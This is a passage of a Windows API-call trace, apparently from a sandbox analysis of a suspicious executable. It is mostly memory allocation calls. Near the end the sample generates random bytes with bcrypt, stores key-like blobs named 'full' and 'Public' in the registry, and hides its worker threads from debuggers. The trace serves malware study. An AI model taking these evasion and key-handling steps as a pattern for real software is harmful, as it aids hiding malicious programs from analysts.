(_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.487] free (_Block=0x1fa0398) [0065.487] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.487] free (_Block=0x1fa0398) [0065.487] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.487] free (_Block=0x1fa0398) [0065.487] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.487] free (_Block=0x1fa0398) [0065.487] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.487] free (_Block=0x1fa0398) [0065.487] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.487] free (_Block=0x1fa0398) [0065.487] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.487] free (_Block=0x1fa0398) [0065.487] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.487] free (_Block=0x1fa0398) [0065.487] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.487] free (_Block=0x1fa0398) [0065.487] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.487] free (_Block=0x1fa0398) [0065.487] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.488] free (_Block=0x1fa0398) [0065.488] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.488] free (_Block=0x1fa0398) [0065.488] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.488] free (_Block=0x1fa0398) [0065.488] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.488] free (_Block=0x1fa0398) [0065.488] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.488] free (_Block=0x1fa0398) [0065.488] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.488] free (_Block=0x1fa0398) [0065.488] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.488] free (_Block=0x1fa0398) [0065.488] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.488] free (_Block=0x1fa0398) [0065.488] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.488] free (_Block=0x1fa0398) [0065.488] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.488] free (_Block=0x1fa0398) [0065.488] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.488] free (_Block=0x1fa0398) [0065.488] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.488] free (_Block=0x1fa0398) [0065.489] free (_Block=0x1fa0158) [0065.489] free (_Block=0x1fa0888) [0065.489] free (_Block=0x1fa0770) [0065.489] free (_Block=0x1fa0998) [0065.489] free (_Block=0x1fa2af0) [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa12d0 [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1240 [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa11b0 [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1120 [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1090 [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1000 [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0f70 [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0ee0 [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0e50 [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0dc0 [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0d30 [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0ca0 [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0c10 [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0b80 [0065.489] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0af0 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1480 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1510 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa15a0 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1630 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa16c0 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1750 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa17e0 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1870 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1900 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1990 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1a20 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1ab0 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1b40 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1bd0 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1c60 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1cf0 [0065.490] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1d80 [0065.497] free (_Block=0x1fa12d0) [0065.497] free (_Block=0x1fa1240) [0065.497] free (_Block=0x1fa11b0) [0065.497] free (_Block=0x1fa1120) [0065.497] free (_Block=0x1fa1090) [0065.497] free (_Block=0x1fa1000) [0065.497] free (_Block=0x1fa0f70) [0065.497] free (_Block=0x1fa0ee0) [0065.497] free (_Block=0x1fa0e50) [0065.497] free (_Block=0x1fa0dc0) [0065.497] free (_Block=0x1fa0d30) [0065.497] free (_Block=0x1fa0ca0) [0065.497] free (_Block=0x1fa0c10) [0065.497] free (_Block=0x1fa0b80) [0065.497] free (_Block=0x1fa0af0) [0065.497] free (_Block=0x1fa1480) [0065.497] free (_Block=0x1fa1510) [0065.498] free (_Block=0x1fa15a0) [0065.498] free (_Block=0x1fa1630) [0065.498] free (_Block=0x1fa16c0) [0065.498] free (_Block=0x1fa1750) [0065.498] free (_Block=0x1fa17e0) [0065.498] free (_Block=0x1fa1870) [0065.498] free (_Block=0x1fa1900) [0065.498] free (_Block=0x1fa1990) [0065.498] free (_Block=0x1fa1a20) [0065.498] free (_Block=0x1fa1ab0) [0065.498] free (_Block=0x1fa1b40) [0065.498] free (_Block=0x1fa1bd0) [0065.498] free (_Block=0x1fa1c60) [0065.498] free (_Block=0x1fa1cf0) [0065.498] free (_Block=0x1fa1d80) [0065.498] free (_Block=0x1fa1360) [0065.498] free (_Block=0x77fea0) [0065.498] free (_Block=0x77dbc8) [0065.498] free (_Block=0x77db40) [0065.498] free (_Block=0x1fa13f0) [0065.498] free (_Block=0x1fa0048) [0065.499] calloc (_Count=0x20, _Size=0x4) returned 0x77db40 [0065.499] calloc (_Count=0x20, _Size=0x4) returned 0x77dbc8 [0065.499] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0065.499] calloc (_Count=0x21, _Size=0x4) returned 0x1fa13f0 [0065.499] free (_Block=0x77dc50) [0065.499] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0065.499] calloc (_Count=0x42, _Size=0x4) returned 0x77fea0 [0065.499] calloc (_Count=0x1, _Size=0x4) returned 0x1fa0398 [0065.499] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0048 [0065.499] free (_Block=0x1fa0398) [0065.499] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0158 [0065.499] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0065.499] calloc (_Count=0x43, _Size=0x4) returned 0x1fa0770 [0065.499] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.499] calloc (_Count=0x3, _Size=0x4) returned 0x1fa2af0 [0065.499] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1d80 [0065.499] free (_Block=0x77dc50) [0065.499] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0888 [0065.499] free (_Block=0x1fa1d80) [0065.500] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.500] calloc (_Count=0x3, _Size=0x4) returned 0x1fa2b08 [0065.500] free (_Block=0x1fa0398) [0065.500] free (_Block=0x1fa0388) [0065.500] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.500] free (_Block=0x1fa0388) [0065.500] calloc (_Count=0x22, _Size=0x4) returned 0x1fa1d80 [0065.500] free (_Block=0x1fa2b08) [0065.500] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0998 [0065.500] free (_Block=0x1fa1d80) [0065.500] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.500] free (_Block=0x1fa0388) [0065.500] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.500] free (_Block=0x1fa0388) [0065.500] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.500] free (_Block=0x1fa0388) [0065.500] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.500] free (_Block=0x1fa0388) [0065.500] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.500] free (_Block=0x1fa0388) [0065.500] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.500] free (_Block=0x1fa0388) [0065.501] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.501] free (_Block=0x1fa0388) [0065.501] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.501] free (_Block=0x1fa0388) [0065.501] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.501] free (_Block=0x1fa0388) [0065.501] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.501] free (_Block=0x1fa0388) [0065.501] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.501] free (_Block=0x1fa0388) [0065.501] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.501] free (_Block=0x1fa0388) [0065.501] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.501] free (_Block=0x1fa0388) [0065.501] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.501] free (_Block=0x1fa0388) [0065.501] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.501] free (_Block=0x1fa0388) [0065.501] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.501] free (_Block=0x1fa0388) [0065.501] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.501] free (_Block=0x1fa0388) [0065.502] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.502] free (_Block=0x1fa0388) [0065.502] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.502] free (_Block=0x1fa0388) [0065.502] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.502] free (_Block=0x1fa0388) [0065.502] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.502] free (_Block=0x1fa0388) [0065.502] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.502] free (_Block=0x1fa0388) [0065.502] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.502] free (_Block=0x1fa0388) [0065.502] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.502] free (_Block=0x1fa0388) [0065.502] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.502] free (_Block=0x1fa0388) [0065.502] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.502] free (_Block=0x1fa0388) [0065.502] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.502] free (_Block=0x1fa0388) [0065.502] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.503] free (_Block=0x1fa0388) [0065.503] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.503] free (_Block=0x1fa0388) [0065.503] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.503] free (_Block=0x1fa0388) [0065.503] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.503] free (_Block=0x1fa0388) [0065.503] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.503] free (_Block=0x1fa0388) [0065.503] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.503] free (_Block=0x1fa0388) [0065.503] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.503] free (_Block=0x1fa0388) [0065.503] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.503] free (_Block=0x1fa0388) [0065.503] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.503] free (_Block=0x1fa0388) [0065.503] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.503] free (_Block=0x1fa0388) [0065.503] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.503] free (_Block=0x1fa0388) [0065.503] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.503] free (_Block=0x1fa0388) [0065.503] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.504] free (_Block=0x1fa0388) [0065.504] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.504] free (_Block=0x1fa0388) [0065.504] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.504] free (_Block=0x1fa0388) [0065.504] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.504] free (_Block=0x1fa0388) [0065.504] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.504] free (_Block=0x1fa0388) [0065.504] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.504] free (_Block=0x1fa0388) [0065.504] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.504] free (_Block=0x1fa0388) [0065.504] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.504] free (_Block=0x1fa0388) [0065.504] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.504] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.504] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.505] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1d80 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1cf0 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1c60 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1bd0 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1b40 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1ab0 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1a20 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1990 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1900 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1870 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa17e0 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1750 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa16c0 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1630 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa15a0 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1510 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1480 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0af0 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0b80 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0c10 [0065.506] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0ca0 [0065.507] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0d30 [0065.507] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0dc0 [0065.507] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0e50 [0065.507] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0ee0 [0065.507] calloc (_Count=0x21, _Size=0x4) returned 0x1fa0f70 [0065.507] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1000 [0065.507] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1090 [0065.507] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1120 [0065.507] calloc (_Count=0x21, _Size=0x4) returned 0x1fa11b0 [0065.507] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1240 [0065.507] calloc (_Count=0x21, _Size=0x4) returned 0x1fa12d0 [0065.513] calloc (_Count=0x20, _Size=0x4) returned 0x77dbc8 [0065.513] calloc (_Count=0x20, _Size=0x4) returned 0x77db40 [0065.514] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0065.514] calloc (_Count=0x21, _Size=0x4) returned 0x1fa13f0 [0065.514] calloc (_Count=0x21, _Size=0x4) returned 0x1fa1360 [0065.514] calloc (_Count=0x42, _Size=0x4) returned 0x77fea0 [0065.514] calloc (_Count=0x1, _Size=0x4) returned 0x1fa0388 [0065.514] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0048 [0065.514] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0158 [0065.514] calloc (_Count=0x20, _Size=0x4) returned 0x77dc50 [0065.514] calloc (_Count=0x43, _Size=0x4) returned 0x1fa0770 [0065.514] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0388 [0065.514] calloc (_Count=0x3, _Size=0x4) returned 0x1fa2af0 [0065.514] calloc (_Count=0x21, _Size=0x4) returned 0x1fa12d0 [0065.514] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0888 [0065.514] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.514] calloc (_Count=0x3, _Size=0x4) returned 0x1fa2b08 [0065.514] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.514] calloc (_Count=0x22, _Size=0x4) returned 0x1fa12d0 [0065.514] calloc (_Count=0x41, _Size=0x4) returned 0x1fa0998 [0065.514] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.515] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.516] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.516] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.516] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.516] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.516] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.516] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.516] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.516] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.516] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.516] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.516] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.516] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0065.516] calloc (_Count=0x2, _Size=0x4) returned 0x1fa0398 [0067.771] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0067.772] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0067.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x18f278, cbBuffer=0x64, dwFlags=0x2 | out: pbBuffer=0x18f278) returned 0x0 [0067.772] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0067.772] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0067.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x18ec5c, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x18ec5c) returned 0x0 [0067.774] RegSetValueExA (in: hKey=0x14c, lpValueName="full", Reserved=0x0, dwType=0x3, lpData=0x428960*, cbData=0x500 | out: lpData=0x428960*) returned 0x0 [0067.774] RegSetValueExA (in: hKey=0x14c, lpValueName="Public", Reserved=0x0, dwType=0x3, lpData=0x77d368*, cbData=0x103 | out: lpData=0x77d368*) returned 0x0 [0067.774] RegCloseKey (hKey=0x14c) returned 0x0 [0067.774] calloc (_Count=0x40, _Size=0x4) returned 0x1fa0990 [0067.774] calloc (_Count=0x1, _Size=0x4) returned 0x1fa03d8 [0067.774] calloc (_Count=0x40, _Size=0x4) returned 0x1fa0228 [0067.774] calloc (_Count=0x1, _Size=0x4) returned 0x1fa0388 [0067.774] malloc (_Size=0x646) returned 0x1fa30f8 [0067.850] CryptBinaryToStringA (in: pbBinary=0x427000, cbBinary=0x8, dwFlags=0x4, pszString=0x18fad8, pcchString=0x18fb6c | out: pszString="81 f3 69 65 46 32 75 00\r\n", pcchString=0x18fb6c) returned 1 [0068.641] CryptBinaryToStringA (in: pbBinary=0x77d368, cbBinary=0x8, dwFlags=0x4, pszString=0x18fad8, pcchString=0x18fb6c | out: pszString="bb f5 07 b5 4e 83 05 28\r\n", pcchString=0x18fb6c) returned 1 [0068.641] free (_Block=0x77d368) [0068.641] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x14c [0068.641] wvsprintfA (in: param_1=0x18f660, param_2="Starting IO threads...", arglist=0x18fba0 | out: param_1="Starting IO threads...") returned 22 [0068.641] wsprintfA (in: param_1=0x18f660, param_2="%s\r\n" | out: param_1="Starting IO threads...\r\n") returned 24 [0068.641] GetLocalTime (in: lpSystemTime=0x18fb60 | out: lpSystemTime=0x18fb60*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x13, wSecond=0x32, wMilliseconds=0x285)) [0068.641] wsprintfA (in: param_1=0x18fa60, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:19:50] ") returned 11 [0068.641] SetThreadUILanguage (LangId=0x409) returned 0x409 [0068.642] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0068.642] WriteFile (in: hFile=0x7, lpBuffer=0x18fa60*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x18fb8c, lpOverlapped=0x0 | out: lpBuffer=0x18fa60*, lpNumberOfBytesWritten=0x18fb8c*=0xb, lpOverlapped=0x0) returned 1 [0068.642] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0068.642] WriteFile (in: hFile=0x7, lpBuffer=0x18f660*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x18fb8c, lpOverlapped=0x0 | out: lpBuffer=0x18f660*, lpNumberOfBytesWritten=0x18fb8c*=0x18, lpOverlapped=0x0) returned 1 [0068.643] GetConsoleWindow () returned 0x5011c [0068.643] IsWindowVisible (hWnd=0x5011c) returned 0 [0068.643] NtCreateThreadEx (in: ThreadHandle=0x18fb94, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41cb10, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fb94*=0x264, lpBytesBuffer=0x0) returned 0x0 [0068.643] NtSetInformationThread (ThreadHandle=0x264, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0068.643] NtCreateThreadEx (in: ThreadHandle=0x18fb94, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41cb10, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fb94*=0x1a8, lpBytesBuffer=0x0) returned 0x0 [0068.644] NtSetInformationThread (ThreadHandle=0x1a8, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0068.644] NtSetInformationThread (ThreadHandle=0x264, ThreadInformationClass=0x4, ThreadInformation=0x18fc04, ThreadInformationLength=0x4) returned 0x0 [0068.644] NtSetInformationThread (ThreadHandle=0x1a8, ThreadInformationClass=0x4, ThreadInformation=0x18fc04, ThreadInformationLength=0x4) returned 0x0 [0068.644] NtCreateThreadEx (in: ThreadHandle=0x18fb94, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41cb10, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fb94*=0x260, lpBytesBuffer=0x0) returned 0x0 [0068.644] NtSetInformationThread (ThreadHandle=0x260, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0068.644] NtCreateThreadEx (in: ThreadHandle=0x18fb94, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41cb10, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fb94*=0x1a4, lpBytesBuffer=0x0) returned 0x0 [0068.644] NtSetInformationThread (ThreadHandle=0x1a4, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0068.645] NtSetInformationThread (ThreadHandle=0x260, ThreadInformationClass=0x4, ThreadInformation=0x18fc04, ThreadInformationLength=0x4) returned 0xc000000d [0068.645] NtSetInformationThread (ThreadHandle=0x1a4, ThreadInformationClass=0x4, ThreadInformation=0x18fc04, ThreadInformationLength=0x4) returned 0xc000000d [0068.645] NtCreateThreadEx (in: ThreadHandle=0x18fb94, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41cb10, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fb94*=0x19c, lpBytesBuffer=0x0) returned 0x0 [0068.645] NtSetInformationThread (ThreadHandle=0x19c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0068.645] NtCreateThreadEx (in: ThreadHandle=0x18fb94, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41cb10, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fb94*=0x198, lpBytesBuffer=0x0) returned 0x0 [0068.646] NtSetInformationThread (ThreadHandle=0x198, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0068.646] NtSetInformationThread (ThreadHandle=0x19c, ThreadInformationClass=0x4, ThreadInformation=0x18fc04, ThreadInformationLength=0x4) returned 0xc000000d [0068.647] NtSetInformationThread (ThreadHandle=0x198, ThreadInformationClass=0x4, ThreadInformation=0x18fc04, ThreadInformationLength=0x4) returned 0xc000000d [0068.647] NtCreateThreadEx (in: ThreadHandle=0x18fb94, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41cb10, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x18fb94*=0x1a0, lpBytesBuffer=0x0) returned 0x0 [0068.647] NtSetInformationThread 